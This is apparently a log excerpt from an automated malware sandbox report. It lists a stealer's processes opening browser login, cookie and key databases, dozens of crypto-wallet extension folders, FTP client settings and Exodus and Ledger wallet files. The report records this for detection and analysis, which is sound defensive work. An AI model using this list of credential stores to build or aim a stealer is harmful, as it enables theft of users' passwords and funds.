Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
